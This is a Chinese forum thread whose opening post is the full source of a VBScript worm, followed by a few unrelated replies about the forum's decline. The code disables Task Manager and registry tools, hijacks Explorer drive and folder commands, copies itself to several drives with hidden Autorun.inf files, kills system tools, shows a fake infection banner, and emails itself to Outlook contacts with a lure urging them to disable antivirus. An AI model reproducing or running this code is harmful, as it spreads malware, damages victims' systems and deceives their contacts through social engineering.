vbs病毒
on error resume nextset wshshell=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.getfile(wscript.scriptfullname)
set ol=createobject("outlook.application")
set mail=ol.createitem(0)
wshshell.run "https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Command Processor\Autorun","exit"
wshshell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
wshshell.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr",1,"REG_DWORD"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\auto\command\","C:\Script.Girl.vbs"
wshshell.regwrite "HKEY_CLASSES_ROOT\Drive\shell\","auto"
wshshell.regwrite "HKEY_CLASSES_ROOT\Drive\shell\auto\command\","C:\Script.Girl.vbs"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\","auto"
wshshell.regwrite "HKEY_CLASSES_ROOT\Directory\shell\auto\command\","C:\Script.Girl.vbs"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\auto\command\","C:\Script.Girl.vbs"
wshshell.regwrite "HKEY_CLASSES_ROOT\exefile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CLASSES_ROOT\txtfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CLASSES_ROOT\batfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_CLASSES_ROOT\inifile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\","https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg\","txtfile"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","Hello!Let me play a little joke on you"
wshshell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","Your computer has been infected with a virus!Kill the virus!Quickly antivirus or reinstall the computer!"
myfile.copy "C:"
myfile.copy "D:"
myfile.copy "E:"
myfile.copy "F:"
set t1=fso.createtextfile("C:\Autorun.inf",true)
t1.writeline("")
t1.writeline("open=Script.Girl.vbs")
t1.writeline("shellexecute=Script.Girl.vbs")
t1.writeline("shell\Auto\command=Script.Girl.vbs")
t1.writeline("")
t1.writeline("open=Script.Girl.exe")
t1.writeline("shellexecute=Script.Girl.exe")
t1.writeline("shell\Auto\command=Script.Girl.exe")
set t2=fso.createtextfile("D:\Autorun.inf",true)
t2.writeline("")
t2.writeline("open=Script.Girl.vbs")
t2.writeline("shellexecute=Script.Girl.vbs")
t2.writeline("shell\Auto\command=Script.Girl.vbs")
t2.writeline("")
t2.writeline("open=Script.Girl.exe")
t2.writeline("shellexecute=Script.Girl.exe")
t2.writeline("shell\Auto\command=Script.Girl.exe")
set t3=fso.createtextfile("E:\Autorun.inf",true)
t3.writeline("")
t3.writeline("open=Script.Girl.vbs")
t3.writeline("shellexecute=Script.Girl.vbs")
t3.writeline("shell\Auto\command=Script.Girl.vbs")
t3.writeline("")
t3.writeline("open=Script.Girl.exe")
t3.writeline("shellexecute=Script.Girl.exe")
t3.writeline("shell\Auto\command=Script.Girl.exe")
set t4=fso.createtextfile("F:\Autorun.inf",true)
t4.writeline("")
t4.writeline("open=Script.Girl.vbs")
t4.writeline("shellexecute=Script.Girl.vbs")
t4.writeline("shell\Auto\command=Script.Girl.vbs")
t4.writeline("")
t4.writeline("open=Script.Girl.exe")
t4.writeline("shellexecute=Script.Girl.exe")
t4.writeline("shell\Auto\command=Script.Girl.exe")
wshshell.run "cmd /c attrib +h C:\Autorun.inf"
wshshell.run "cmd /c attrib +h D:\Autorun.inf"
wshshell.run "cmd /c attrib +h E:\Autorun.inf"
wshshell.run "cmd /c attrib +h F:\Autorun.inf"
wshshell.run "cmd /c taskkill -f -im cmd.exe"
wshshell.run "cmd /c taskkill -f -im notepad.exe"
wshshell.run "cmd /c taskkill -f -im regedit.exe"
wshshell.run "cmd /c taskkill -f -im taskmgr.exe"
for x=1 to 10
mail.to=ol.getnamespace("mapi").addresslists(1).addressentries(x)
mail.subject="Cute and sexy sailor girl"
mail.body="Would you like to see more pictures of sailor girls?The installer is in the attachment.Setup does not write the publisher.Please turn off the antivirus software before installing it"
mail.attachments.add("https://image.so.com/view?q=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&src=tab_www&correct=%E6%80%A7%E6%84%9F%E6%B0%B4%E6%89%8B%E6%9C%8D&ancestor=list&cmsid=51fb65e2399019f08dd6be9278d32a6e&cmras=0&cn=0&gn=0&kn=0&crn=0&bxn=0&fsn=60&cuben=0&pornn=0&manun=14&adstar=0&clw=264#id=66e0556284b8c9a5e6e8dafc1d8774af&prevsn=244&currsn=290&ps=365&pc=43")
mail.attachments.add("C:\Script.Girl.vbs")
mail.attachments.add("C:\Script.Girl.exe")
mail.send
next 好久没看到活人了! 幻剑游云 发表于 2023-12-11 23:24
好久没看到活人了!
到底发生了什么? 沉默的某人 发表于 2023-12-14 22:26
到底发生了什么?
两次整改,一次合作,一次大删帖,一次强制实名,一次换域名,你说哪个? 幻剑游云 发表于 2023-12-11 23:24
好久没看到活人了!
哈哈,我还在。 H.U.C清风 发表于 2023-12-16 13:17
哈哈,我还在。
偏爱没看见你呢 幻剑游云 发表于 2023-12-16 20:08
偏爱没看见你呢
主要是我不怎么发帖
页:
[1]